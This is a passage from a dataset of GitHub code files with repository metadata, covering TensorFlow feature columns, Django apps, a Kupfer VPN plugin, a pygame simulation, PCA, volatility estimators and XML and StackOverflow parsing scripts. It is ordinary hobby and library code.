input_layer are float32.\n # one_hot_id_tensor = array_ops.one_hot(dense_id_tensor, depth=self.categorical_column.num_buckets, on_value=1.0,\n # off_value=0.0)\n\n # dense_id_tensor = math_ops.reduce_sum(dense_id_tensor, axis=[-2])\n return dense_id_tensor\n\n # return id_tensor\n\n def transform_feature(self, transformation_cache, state_manager):\n id_weight_pair = self.categorical_column.get_sparse_tensors(\n transformation_cache, state_manager)\n return self._transform_id_weight_pair(id_weight_pair)\n\n @property\n def parse_example_spec(self):\n \"\"\"See `FeatureColumn` base class.\"\"\"\n return self.categorical_column.parse_example_spec\n\n @property\n def variable_shape(self):\n \"\"\"Returns a `TensorShape` representing the shape of the dense `Tensor`.\"\"\"\n\n if isinstance(self.categorical_column, FeatureColumn):\n # return tensor_shape.TensorShape([1, self.categorical_column.num_buckets])\n # return tensor_shape.TensorShape([1, self.size])\n return tensor_shape.TensorShape(1)\n else:\n # return tensor_shape.TensorShape([1, self.categorical_column._num_buckets])\n return tensor_shape.TensorShape(1)\n\n def get_dense_tensor(self, transformation_cache, state_manager):\n if isinstance(self.categorical_column, SequenceCategoricalColumn):\n raise ValueError(\n 'In indicator_column: {}. '\n 'categorical_column must not be of type SequenceCategoricalColumn. '\n 'Suggested fix A: If you wish to use DenseFeatures, use a '\n 'non-sequence categorical_column_with_*. '\n 'Suggested fix B: If you wish to create sequence input, use '\n 'SequenceFeatures instead of DenseFeatures. '\n 'Given (type {}): {}'.format(self.name, type(self.categorical_column), self.categorical_column))\n # Feature has been already transformed. Return the intermediate\n # representation created by transform_feature.\n return transformation_cache.get(self, state_manager)\n\n def get_sequence_dense_tensor(self, transformation_cache, state_manager):\n \"\"\"See `SequenceDenseColumn` base class.\"\"\"\n if not isinstance(self.categorical_column, SequenceCategoricalColumn):\n raise ValueError(\n 'In indicator_column: {}. categorical_column must be of type SequenceCategoricalColumn '\n 'to use SequenceFeatures. Suggested fix: Use one of sequence_categorical_column_with_*. '\n 'Given (type {}): {}'.format(self.name, type(self.categorical_column), self.categorical_column))\n # Feature has been already transformed. Return the intermediate representation created by transform_feature.\n dense_tensor = transformation_cache.get(self, state_manager)\n sparse_tensors = self.categorical_column.get_sparse_tensors(\n transformation_cache, state_manager)\n sequence_length = fc_utils.sequence_length_from_sparse_tensor(\n sparse_tensors.id_tensor)\n return SequenceDenseColumn.TensorSequenceLengthPair(dense_tensor=dense_tensor, sequence_length=sequence_length)\n\n @property\n def parents(self):\n \"\"\"See 'FeatureColumn` base class.\"\"\"\n return [self.categorical_column]\n\n def get_config(self):\n \"\"\"See 'FeatureColumn` base class.\"\"\"\n from tensorflow.python.feature_column.serialization import serialize_feature_column\n config = dict(zip(self._fields, self))\n config['categorical_column'] = serialize_feature_column(\n self.categorical_column)\n return config\n\n @classmethod\n def from_config(cls, config, custom_objects=None, columns_by_name=None):\n \"\"\"See 'FeatureColumn` base class.\"\"\"\n from tensorflow.python.feature_column.serialization import \\\n deserialize_feature_column # pylint: disable=g-import-not-at-top\n _check_config_keys(config, cls._fields)\n kwargs = _standardize_and_copy_config(config)\n kwargs['categorical_column'] = deserialize_feature_column(config['categorical_column'], custom_objects,\n columns_by_name)\n return cls(**kwargs)\n\n @deprecation.deprecated(_FEATURE_COLUMN_DEPRECATION_DATE, _FEATURE_COLUMN_DEPRECATION)\n def _transform_feature(self, inputs):\n id_weight_pair = self.categorical_column._get_sparse_tensors(\n inputs) # pylint: disable=protected-access\n return self._transform_id_weight_pair(id_weight_pair)\n\n @property\n @deprecation.deprecated(_FEATURE_COLUMN_DEPRECATION_DATE, _FEATURE_COLUMN_DEPRECATION)\n def _variable_shape(self):\n return tensor_shape.TensorShape([1, self.categorical_column._num_buckets]) # pylint: disable=protected-access\n\n @property\n def parse_example_spec(self):\n \"\"\"See `FeatureColumn` base class.\"\"\"\n return self.categorical_column.parse_example_spec\n\n @property\n @deprecation.deprecated(_FEATURE_COLUMN_DEPRECATION_DATE, _FEATURE_COLUMN_DEPRECATION)\n def _parse_example_spec(self):\n return self.categorical_column._parse_example_spec # pylint: disable=protected-access\n\n @deprecation.deprecated(_FEATURE_COLUMN_DEPRECATION_DATE, _FEATURE_COLUMN_DEPRECATION)\n def _get_dense_tensor(self, inputs, weight_collections=None, trainable=None):\n del weight_collections\n del trainable\n if isinstance(\n self.categorical_column,\n (SequenceCategoricalColumn, fc_old._SequenceCategoricalColumn)): # pylint: disable=protected-access\n raise ValueError(\n 'In indicator_column: {}. '\n 'categorical_column must not be of type _SequenceCategoricalColumn. '\n 'Suggested fix A: If you wish to use DenseFeatures, use a '\n 'non-sequence categorical_column_with_*. '\n 'Suggested fix B: If you wish to create sequence input, use '\n 'SequenceFeatures instead of DenseFeatures. '\n 'Given (type {}): {}'.format(self.name, type(self.categorical_column),\n self.categorical_column))\n # Feature has been already transformed. Return the intermediate\n # representation created by transform_feature.\n return inputs.get(self)\n\n @deprecation.deprecated(_FEATURE_COLUMN_DEPRECATION_DATE, _FEATURE_COLUMN_DEPRECATION)\n def _get_sequence_dense_tensor(self,\n inputs,\n weight_collections=None,\n trainable=None):\n # Do nothing with weight_collections and trainable since no variables are\n # created in this function.\n del weight_collections\n del trainable\n if not isinstance(\n self.categorical_column,\n (SequenceCategoricalColumn, fc_old._SequenceCategoricalColumn)): # pylint: disable=protected-access\n raise ValueError(\n 'In indicator_column: {}. '\n 'categorical_column must be of type _SequenceCategoricalColumn '\n 'to use SequenceFeatures. '\n 'Suggested fix: Use one of sequence_categorical_column_with_*. '\n 'Given (type {}): {}'.format(self.name, type(self.categorical_column),\n self.categorical_column))\n # Feature has been already transformed. Return the intermediate\n # representation created by _transform_feature.\n dense_tensor = inputs.get(self)\n sparse_tensors = self.categorical_column._get_sparse_tensors(\n inputs) # pylint: disable=protected-access\n sequence_length = fc_utils.sequence_length_from_sparse_tensor(\n sparse_tensors.id_tensor)\n return SequenceDenseColumn.TensorSequenceLengthPair(\n dense_tensor=dense_tensor, sequence_length=sequence_length)\n\n\ndef _check_config_keys(config, expected_keys):\n \"\"\"Checks that a config has all expected_keys.\"\"\"\n if set(config.keys()) != set(expected_keys):\n raise ValueError(\n 'Invalid config: {}, expected keys: {}'.format(config, expected_keys))\n\n\ndef _standardize_and_copy_config(config):\n \"\"\"Returns a shallow copy of config with lists turned to tuples.\n\n Keras serialization uses nest to listify everything.\n This causes problems with the NumericColumn shape, which becomes\n unhashable. We could try to solve this on the Keras side, but that\n would require lots of tracking to avoid changing existing behavior.\n Instead, we ensure here that we revive correctly.\n\n Args:\n config: dict that will be used to revive a Feature Column\n\n Returns:\n Shallow copy of config with lists turned to tuples.\n \"\"\"\n kwargs = config.copy()\n for k, v in kwargs.items():\n if isinstance(v, list):\n kwargs[k] = tuple(v)\n\n return kwargs\n","repo_name":"darkchats/notekeras","sub_path":"notekeras/features/feature_column_def.py","file_name":"feature_column_def.py","file_ext":"py","file_size_in_byte":10553,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"35259053450","text":"def show_all():\n with open('data.txt', 'r', encoding='UTF-8') as file:\n content = file.read()\n return content\n\n\ndef add_contact(user):\n with open('data.txt', 'a', encoding='UTF-8') as file:\n file.write(user)\n\ndef error():\n print('error')\n\ndef search(data_str):\n\n with open('data.txt', 'r', encoding='UTF-8') as file:\n count = True\n lst_str = file.readlines()\n for worker in lst_str:\n if data_str in worker:\n print(worker)\n count = False\n if count:\n print('\\nТакого пользователя нет.\\n')\n\ndef change_contact(data_str):\n with open('data.txt', 'r', encoding='UTF-8') as f1:\n lines = f1.readlines()\n\n for worker in lines:\n worker = worker.strip()\n if data_str in worker:\n f1.write(input()+'\\n')\n\n\n","repo_name":"dzhon505/pythonGB_HomeWorks","sub_path":"seminar8/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"28740755740","text":"from django.urls import path,include\nfrom . import views\n\nurlpatterns = [\n path('index/',views.index,name='index1'),\n path('products/',views.products,name='product'),\n path('',views.index,name='homepage'),\n path('form/',views.form,name='form'),\n path('details/',views.details,name='details')\n\n # path(\"\",include('views.index'))\n\n]\n","repo_name":"ShashwatKumar01/Ecommerce-Site-Django","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"37018022931","text":"import config as cfg\r\nfrom simple_pid import PID\r\n\r\npidx = PID(cfg.PID_P, cfg.PID_I, cfg.PID_D, setpoint=0)\r\npidy = PID(cfg.PID_P, cfg.PID_I, cfg.PID_D, setpoint=0)\r\npidx.output_limits = (-1, 1)\r\npidy.output_limits = (-1, 1)\r\npidx.sample_time = cfg.interval\r\npidy.sample_time = cfg.interval\r\n\r\n\r\ndef calculatePID(ptobj, pttgt):\r\n ptx = ptobj[0] - pttgt[0]\r\n pty = ptobj[1] - pttgt[1]\r\n controlx = pidx(ptx)\r\n controly = pidy(pty)\r\n return [controlx, controly]\r\n","repo_name":"RAMOTS/autoguiding","sub_path":"stereoPID.py","file_name":"stereoPID.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"74288068749","text":"\"\"\"Contains the serializers for the devices app.\"\"\"\nfrom rest_framework import serializers as s\n\nfrom .models import Device, Screenshot, Chaver, Log\n\n\nclass UninstallCodeSerializer(s.ModelSerializer):\n \"\"\"Serializer for uninstall code\"\"\"\n class Meta: # pylint: disable=missing-class-docstring\n model = Device\n fields = ('uninstall_code',)\n read_only_fields = ('uninstall_code',)\n\nclass ScreenshotSerializer(s.HyperlinkedModelSerializer):\n \"\"\"Serializer for the Screenshot model.\"\"\"\n class Meta: # pylint: disable=missing-class-docstring\n model = Screenshot\n fields = ('id','device','image', 'created','nsfw','false_positive')\n\n\n\nclass ScreenshotUploadSerializer(s.Serializer):\n \"\"\"Serializer for uploading the Screenshots.\"\"\"\n title = s.CharField(required = False)\n exec_name = s.CharField( required = False)\n base64_image = s.CharField(trim_whitespace=False) # Base64 \n\n nsfw = s.BooleanField(default=False)\n profane = s.BooleanField(default=False)\n\n nsfw_detections = s.JSONField(default=dict)\n created = s.DateTimeField()\n\n false_positive = s.BooleanField(default=False)\n\n def create(self, validated_data:dict, device:Device):\n \"\"\"Create a new screenshot.\"\"\"\n from .utils import decode_base64_to_numpy, numpy_to_content_file,deobfuscate_text\n \n # DeObfuscate the title and exec_name\n if 'title' in validated_data:\n title = deobfuscate_text(validated_data.pop('title'))\n else:\n title = 'Uknown Title'\n if 'exec_name' in validated_data:\n exec_name = deobfuscate_text(validated_data.pop('exec_name'))\n else:\n exec_name = 'Uknown Exec Name'\n\n # Decode the base64 image\n base64_image = validated_data.pop('base64_image')\n image = decode_base64_to_numpy(base64_image)\n file = numpy_to_content_file(image)\n\n # Create the screenshot\n screenshot = Screenshot.objects.create(\n title=title,\n exec_name=exec_name,\n image=file,\n device=device,\n **validated_data\n )\n return screenshot\n\nclass ChaverSerializer(s.ModelSerializer):\n \"\"\"Serializer for the Chaver model.\"\"\"\n class Meta: # pylint: disable=missing-class-docstring\n model = Chaver\n fields = ('id', 'name', 'email',\"device\", 'created')\n\nclass VerifyUninstallCodeSerializer(s.Serializer):# pylint: disable=abstract-method\n \"\"\"Serializer for verifying the uninstall code\"\"\"\n uninstall_code = s.CharField(max_length=100)\n\nclass DeviceSerializer(s.ModelSerializer):\n \"\"\"This is the serializer for the Device model\"\"\"\n user = s.HiddenField(default=s.CurrentUserDefault())\n\n chavers = ChaverSerializer(many=True, read_only=True)\n screenshots = ScreenshotSerializer(many=True, read_only=True)\n\n class Meta: # pylint: disable=missing-class-docstring\n model = Device\n fields = ('id','user','name','created','registered','screenshots','chavers')\n read_only_fields = ('created','screenshots','chavers','id','registered','user')\n\n ","repo_name":"dickermoshe/OpenChaver-Server","sub_path":"backend/devices/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"10743098228","text":"\"\"\"\nStart/Stop connections of NetworkManager via nmclia\n\"\"\"\n__kupfer_name__ = _(\"VPN - NMCLI\")\n__kupfer_sources__ = (\"ConnectionSource\",)\n__kupfer_actions__ = (\"Connect\", \"Disconnect\",)\n__description__ = _(\"Connects and Disconnects vpn Connections using nmcli command\")\n__version__ = \"\"\n__author__ = \"Benjamin Jacob \"\n\nfrom kupfer.objects import Action, Source, Leaf, TextLeaf\nfrom kupfer.obj.apps import ApplicationSource\nfrom kupfer import icons\nfrom kupfer import utils\nimport subprocess\nimport os\nimport time\n\n# icons\nconnection_icon = \"security-high\"\nsource_icon = \"network-vpn\"\naction_connect = \"network-connect\"\naction_disconnect = \"network-disconnect\"\n\n# cli - commands\nlistConnections = \"nmcli -t -f uuid,name,type connection show\"\nactiveUuids = \"nmcli -t -f uuid connection show --active\"\nconnectUUid = \"nmcli connection up \"\ndisconnectUUid = \"nmcli connection down \"\n\n# display only VPN connections\nvpnonly = True\n# print debugging output\nverbose = False\n\nclass Connect(Action):\n def __init__(self):\n Action.__init__(self, _(\"Connect\"))\n\n def activate(self, leaf):\n # utils.spawn_async(connectUUid + leaf.uuid)\n run_cmd(connectUUid + leaf.uuid, True)\n leaf.active = True\n\n def get_description(self):\n return _(\"connects a vpn connection\")\n\n def get_icon_name(self):\n return action_connect\n\n def get_gicon(self):\n return icons.ComposedIcon(source_icon, action_connect)\n\n\nclass Disconnect(Action):\n def __init__(self):\n Action.__init__(self, _(\"Disconnect\"))\n\n def activate(self, leaf):\n # utils.spawn_async(disconnectUUid + leaf.uuid)\n run_cmd(disconnectUUid + leaf.uuid, True)\n leaf.active = False\n\n def get_description(self):\n return _(\"disconnects a vpn connection\")\n\n def get_icon_name(self):\n return action_disconnect\n\n def get_gicon(self):\n return icons.ComposedIcon(source_icon, action_disconnect)\n\n\nclass ConnectionSource(ApplicationSource):\n source_user_reloadable = False\n appleaf_content_id = \"vpn-nmcli\"\n source_use_cache = False\n\n def is_dynamic(self):\n \"\"\"\n Whether to recompute contents each time it is accessed\n \"\"\"\n return True\n\n def __init__(self):\n self.connections = []\n self.active_ids = []\n\n # dont query connection - state in short intervals < 10 secs\n self.last_update_con_state = 0\n self.max_age_con_state_secs = 10\n\n # available connections don't change often\n self.last_update_connections = 0\n self.max_age_connections_secs = 120\n\n Source.__init__(self, _(\"VPN - Connections\"))\n\n def update_connection_states(self):\n self.active_ids = []\n if verbose:\n print(\"query connection state\")\n (stdout, exitcode) = run_cmd(activeUuids)\n lines = stdout.split(\"\\n\")\n for activeUuid in lines:\n if not activeUuid:\n continue\n self.active_ids.append(activeUuid)\n\n for con in self.connections:\n con.active = con.uuid in self.active_ids\n if verbose:\n print(\"connection \"+con.name+\" is active:\"+str(con.uuid in self.active_ids))\n\n def update_available_connections(self):\n if verbose:\n print(\"query overall available connections\")\n (stdout, exitcode) = run_cmd(listConnections, False)\n lines = stdout.split(\"\\n\")\n for connStr in lines:\n if not connStr:\n continue\n parts = connStr.split(\":\")\n con_type = parts[2]\n\n if vpnonly and con_type != \"vpn\" and con_type != \"wireguard\":\n continue\n\n uuid = parts[0]\n name = parts[1]\n active = False\n if verbose:\n print(\"connection \"+name+\" is active \" + str(active))\n self.connections.append(Connection(uuid, name, active))\n\n def initialize(self):\n now = time.time()\n if now - self.max_age_connections_secs > self.last_update_connections:\n self.update_available_connections()\n self.last_update_connections = now\n\n if now - self.max_age_con_state_secs > self.last_update_con_state:\n self.update_connection_states()\n self.last_update_con_state = now\n\n def get_items(self):\n \"\"\"thing\"\"\"\n self.initialize()\n for connection in self.connections:\n yield connection\n\n def get_icon_name(self):\n return source_icon\n\n def provides(self):\n yield Connection\n\n\nclass Connection(Leaf):\n \"\"\"The Note Leaf's represented object is the Note URI\"\"\"\n\n def __init__(self, uuid, name, active):\n self.uuid = uuid\n self.name = name\n self.active = active\n Leaf.__init__(self, self.uuid, name)\n\n def get_actions(self):\n if not self.active:\n if verbose:\n print(self.name + \" is active conn,discon\")\n c = Connect()\n c.rank_adjust = 9\n dc = Disconnect()\n dc.rank_adjust = 5\n yield c\n yield dc\n else:\n if verbose:\n print(self.name + \" is active, discon,con\")\n c = Connect()\n c.rank_adjust = 2\n dc = Disconnect()\n dc.rank_adjust = 5\n yield dc\n yield c\n\n def repr_key(self):\n # the Note URI is unique&persistent for each note\n return self.uuid\n\n def get_description(self):\n # TODO: how to translate this ?\n connected = _(\"established\")\n if not self.active:\n connected =_(\"closed\")\n return _(\"The connection\") + \" \"+str(self.name) + \" \" + _(\"is\") + \" \" + connected\n\n def get_icon_name(self):\n return connection_icon\n\n def get_gicon(self):\n if self.active:\n return icons.ComposedIcon(source_icon, action_connect)\n else:\n return icons.ComposedIcon(source_icon, action_disconnect)\n\n\ndef run_cmd(cmd, runAsync=False):\n if verbose:\n print(\"exec cmd: \" + cmd)\n if runAsync:\n subprocess.Popen(cmd, shell=True)\n return\n\n process = subprocess.Popen(cmd,\n shell=True,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True,\n preexec_fn=os.setpgrp)\n # collect stdout & stderr\n try:\n stdoutdata, errs = process.communicate(timeout=15)\n except subprocess.TimeoutExpired:\n process.kill()\n stdoutdata, errs = process.communicate()\n return [stdoutdata, process.returncode]\n\n","repo_name":"dodophoenix/kupfer-networkmanager","sub_path":"vpn-nmcli.py","file_name":"vpn-nmcli.py","file_ext":"py","file_size_in_byte":6754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"71357629069","text":"from os import environ\n\nimport collision_detection\nfrom src.game_statistics import GameStatistics\n\nenviron['PYGAME_HIDE_SUPPORT_PROMPT'] = '1'\n# noqa: E402\nimport pygame\nfrom ants.colony import Colony\nfrom game_settings import SCREEN_WIDTH, SCREEN_HEIGHT, AMOUNT_OF_ANTS, ANT_SIZE\n\n# pygame setup\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\npygame.display.set_caption(\"Ants\")\nfont = pygame.font.Font(None, 24) # You can replace 'None' with a font file path if needed\n\nclock = pygame.time.Clock()\nstart_time = pygame.time.get_ticks()\nrunning_for = 0\nrunning = True\ndt = 0\ndrawn = 0\n\ntext_x = 100\ntext_y = 200\n\ngreen = (0, 255, 0)\nred = (255, 0, 0)\n\n# colony\ncolony = Colony(\"red\", int(AMOUNT_OF_ANTS / 2), ANT_SIZE, red)\ncolony_2 = Colony(\"green\", int(AMOUNT_OF_ANTS / 2), ANT_SIZE, green)\n\ngame_statistics = GameStatistics()\n\nwhile running:\n # poll for events\n # pygame.QUIT event means the user clicked X to close your window\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # update\n colony.update()\n colony_2.update()\n\n\n\n\n # fill the screen with a color to wipe away anything from last frame\n screen.fill(\"black\")\n\n # draw colony / find out if this is truly 60fps\n colony.draw(screen)\n colony_2.draw(screen)\n # end update\n\n collision_detection.fight(colony, colony_2)\n # draw statistics\n game_statistics.update(dt)\n game_statistics.draw_statistics(screen, font, [colony, colony_2])\n\n\n\n # END OF DRAWING\n pygame.display.flip()\n # limits FPS to 60\n # dt is delta time in seconds since last frame, used for framerate-\n # independent physics.\n dt = clock.tick(60) / 1000\npygame.quit()\n","repo_name":"DavidGoestemeier/ants","sub_path":"src/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"35587448562","text":"from django.shortcuts import render, redirect\nfrom .forms import CustomUserCreationForm, LoginForm\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib import messages\n# from .models import App_users\n\n# Create your views here.\ndef index(request):\n\treturn render(\n\t\trequest,\n\t\t'index.html'\n\t)\n\ndef singup_done(request):\n\treturn render(\n\t\trequest,\n\t\t'singup_done.html'\n\t)\n\ndef error(request):\n\treturn render(\n\t\trequest,\n\t\t'error.html'\n\t)\n\ndef singin(request):\n\tif request.method == 'POST':\n\t\tform = LoginForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tcd = form.cleaned_data\n\t\t\tuser = authenticate(email=cd['email'], password=cd['password'])\n\t\t\tif user is not None:\n\t\t\t\tif user.is_active:\n\t\t\t\t\tlogin(request, user)\n\t\t\t\t\treturn redirect('controlPanel')\n\t\t\t\telse:\n\t\t\t\t\treturn redirect('error')\n\t\t\telse:\n\t\t\t \tmessages.error(request, 'Неверное имя пользователя или пароль')\n\t\t\t \treturn render(request, 'singin.html', {'form': form})\n\telse:\n\t\tform = LoginForm()\n\n\treturn render(request, 'singin.html', {'form': form})\n\ndef singup(request):\n\tif request.method == 'POST':\n\t\tuser_form = CustomUserCreationForm(request.POST)\n\t\tif user_form.is_valid():\n\t\t\tnew_user = user_form.save(commit=False)\n\t\t\tnew_user.set_password(user_form.cleaned_data['password'])\n\t\t\tnew_user.save()\n\t\t\treturn redirect('singup_done')\n\telse:\n\t\tuser_form = CustomUserCreationForm()\n\n\treturn render(request,'singup.html',{'user_form': user_form})\n\n@login_required\ndef control_panel(request):\n\tcur_user = request.user\n\n\tids = []\n\n\tfor i in range(10):\n\t\tids.append(i)\n\n\n\tcontext = {\n\t\t'cur_user':cur_user,\n\t\t'ids': ids,\n\n\t}\n\treturn render(request, 'controlPanel.html', context=context)\n\n\n\t","repo_name":"ortlaz/IoT_cloud_project","sub_path":"cloud_project/cloud_project/telemetry/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"8915498775","text":"def iou(box1, box2):\n \"\"\"\n\n Arguments:\n box1 -- first box, list object with coordinates (x1, y1, x2, y2)\n box2 -- second box, list object with coordinates (x1, y1, x2, y2)\n \"\"\"\n\n # Calculate the (y1, x1, y2, x2) coordinates of the intersection of box1 and box2. \n \n xi1 = max(box1[0], box2[0])\n yi1 = max(box1[1], box2[1])\n xi2 = min(box1[2], box2[2])\n yi2 = min(box1[3], box2[3])\n inter_area = (xi2 - xi1) * (yi2 - yi1)\n \n\n # Calculating the Union area by using Formula: Union(A,B) = A + B - Inter(A,B)\n \n box1_area = (box1[2] - box1[0]) * (box1[3] - box1[1])\n box2_area = (box2[2] - box2[0]) * (box2[3] - box2[1])\n union_area = box1_area + box2_area - inter_area\n\n # compute the IoU\n iou = inter_area / union_area\n\n return iou\n","repo_name":"ArvindSubramaniam/Yolo-object-Detection","sub_path":"IOU.py","file_name":"IOU.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"20613848701","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\n\nclass myPCA:\n \n def __init__(self, n_components):\n self.fitted=False\n self.n_components = n_components\n self.trans= []\n self.variance_ratio = []\n self.variance = []\n def fit(self,x):\n Mean = np.mean(x,axis=0)\n Variance = np.cov(x.T)\n\n vals, vecs = np.linalg.eig(Variance)\n sum_values = np.sum(vals)\n var_ratios = vals/sum_values\n y = vecs.T.dot(x.T)\n yt = y.T\n\n for i in range(yt.shape[0]):\n for j in range(yt.shape[1]):\n if(j%2!=0):\n yt[i][j] = -yt[i][j]\n self.fitted=True\n self.trans=yt\n li = [i for i in range(self.n_components)]\n self.variance_ratio = var_ratios\n self.variance_ratio = self.variance_ratio[:self.n_components]\n self.variance = vals\n self.variance = self.variance[:self.n_components]\n def transform(self):\n if(self.fitted==False):\n print(\"Data not fitted\");\n li = [i for i in range(self.n_components)]\n return (self.trans[:,li])\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"SiddhantSinha19/PCA","sub_path":"pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"71172295309","text":"import numpy as np\n\ndef standard_dev(df):\n close_ = df['Close'].values\n return np.std(close_)\n\ndef close_to_close(df):\n close_ = df['Close'].values\n returns = close_[1:] / close_[:-1]\n log_returns = np.log(returns)\n ctc = np.sqrt(np.mean(log_returns**2))\n return ctc\n\ndef parkinson(df):\n open_ = df['Open'].values\n high_ = df['High'].values\n low_ = df['Low'].values\n close_ = df['Close'].values\n pk = np.sqrt(1 / (4*np.log(2)) * np.mean(np.log(high_/low_)**2))\n return pk\n\ndef garman_klass(df):\n open_ = df['Open'].values\n high_ = df['High'].values\n low_ = df['Low'].values\n close_ = df['Close'].values\n\n f1 = np.mean(0.5*np.log(high_/low_)**2)\n f2 = np.mean((2*np.log(2)-1)*np.log(close_/open_)**2)\n gk = np.sqrt(f1-f2)\n return gk\n\ndef rogers_satchell(df):\n open_ = df['Open'].values\n high_ = df['High'].values\n low_ = df['Low'].values\n close_ = df['Close'].values\n vol = np.sqrt(np.mean(np.log(high_/close_)*np.log(high_/open_)+np.log(low_/close_)*np.log(low_/open_)))\n return vol\n\ndef garman_klass_yang_zhang(df):\n open_ = df['Open'].values[1:]\n high_ = df['High'].values[1:]\n low_ = df['Low'].values[1:]\n close_ = df['Close'].values[1:]\n prev_close = df['Close'].shift().values[1:]\n\n f1 = np.mean(np.log(open_/prev_close)**2)\n f2 = np.mean(0.5*np.log(high_/low_)**2)\n f3 = np.mean((2*np.log(2)-1)*(np.log(close_/open_)**2))\n vola = np.sqrt(f1+f2-f3)\n return vola\n\ndef yang_zhang(df):\n open_ = df['Open'].values[1:]\n high_ = df['High'].values[1:]\n low_ = df['Low'].values[1:]\n close_ = df['Close'].values[1:]\n prev_close = df['Close'].shift().values[1:]\n\n alpha = 1.34 # Suggested value in original Yang Zhang paper\n T = len(open_)\n k = (alpha-1) / (alpha + (T+1)/(T-1))\n\n rs = rogers_satchell(df)\n overnight = np.sum(np.power(np.log(open_/prev_close)-np.mean(np.log(open_/prev_close)), 2)) / (T-1)\n open_close = np.sum(np.power(np.log(close_/open_)-np.mean(np.log(close_/open_)), 2)) / (T-1)\n yz = np.sqrt( overnight + k*open_close + (1-k)*np.power(rs, 2))\n return yz\n","repo_name":"fco-jle/MachineTrading","sub_path":"time_series_analysis/volatility.py","file_name":"volatility.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70022821387","text":"\"\"\"\nYou want to create your local database containing information about the things you find the coolest. You used to store this information\nin xml documents, so now you need to come up with an algorithm that will convert the existing format into the new one. First you\ndecided to choose a structure for your scheme, and to do it you want to represent xml document as a tree, i.e. gather all the tags and\nprint them out as follows:\n\n tag1()\n --tag1.1(attribute1, attribute2, ...)\n ----tag1.1.1(attribute1, attribute2, ...)\n ----tag1.1.2(attribute1, attribute2, ...)\n --tag1.2(attribute1, attribute2, ...)\n ----tag1.2.1(attribute1, attribute2, ...)\n ...\nwhere attributes of each tag are sorted lexicographically.\n\nYou are a careful person, so the structure of the xml is neatly organized is such a way that:\n\n there is a single tag at the root level;\n each tag has a single parent tag (i.e. if there are several occurrences of tag a, and in one occurrence it's a child of tag b and in\n the other one it's a child of tag c, then b = c);\n each appearance of the same tag belongs to the same level.\n \nGiven an xml file, return its structure as shown above. The tags of the same level should be sorted in the order they appear in xml, and\nthe attributes should be sorted lexicographically.\n\"\"\"\nfrom collections import OrderedDict\nimport xml.etree.ElementTree as ET\n\ndef depthIter(element):\n stack = []\n stack.append(iter(element))\n yield (element, 0)\n while stack:\n currentElement = next(stack[-1], None)\n if currentElement is None:\n stack.pop()\n else:\n yield (currentElement, len(stack))\n stack.append(iter(currentElement))\n\n\ndef xmlTags(xml):\n result = []\n tags = OrderedDict()\n root = ET.fromstring(xml)\n for element, depth in depthIter(root):\n if element.tag not in tags:\n tags[element.tag] = [depth, set(element.keys())]\n else :\n tags[element.tag][1] |= set(element.keys())\n\n for tag, value in tags.items():\n properties = ', '.join(sorted(value[1]))\n result.append('--'*value[0]+tag+'('+properties+')')\n return result\n","repo_name":"bavalpey/codefights","sub_path":"python/picturingTheParsibilities/xmlTags.py","file_name":"xmlTags.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"82"} +{"seq_id":"40943042364","text":"import json\nimport re\nimport xml.etree.ElementTree as ET\n\n\ncontext = ET.iterparse(r'data/Posts.xml', events=('end', ))\nso_data = []\n\nwith open('data/all_tags.json', 'r') as t:\n tags = json.load(t)\nnum = 0\nnum2 = 0\nindex = 1\ntry:\n for event, elem in context:\n if re.match('2019', elem.get('CreationDate')):\n break\n if re.match('2017|2018', elem.get('CreationDate')) and elem.get('PostTypeId') == '2':\n text = elem.get('Body')\n text = re.sub('<.*?>', '', text)\n text = re.sub('\\n+', '', text)\n so_data.append({'Score': elem.get('Score'), 'Body': text, 'Tags': tags[elem.get('ParentId')]})\n num += 1\n if num % 1000 == 0:\n print(elem.get('CreationDate'))\n if num % 10000 == 0:\n with open('posts2018/so_posts_2017_18_{}.json'.format(index), 'w') as com:\n json.dump(so_data, com)\n index += 1\n so_data = []\n else:\n num2 += 1\n if num2 % 100 == 0:\n print('100')\nexcept:\n pass\n\nwith open('posts2018/so_posts_2017_18_last.json', 'w') as com:\n json.dump(so_data, 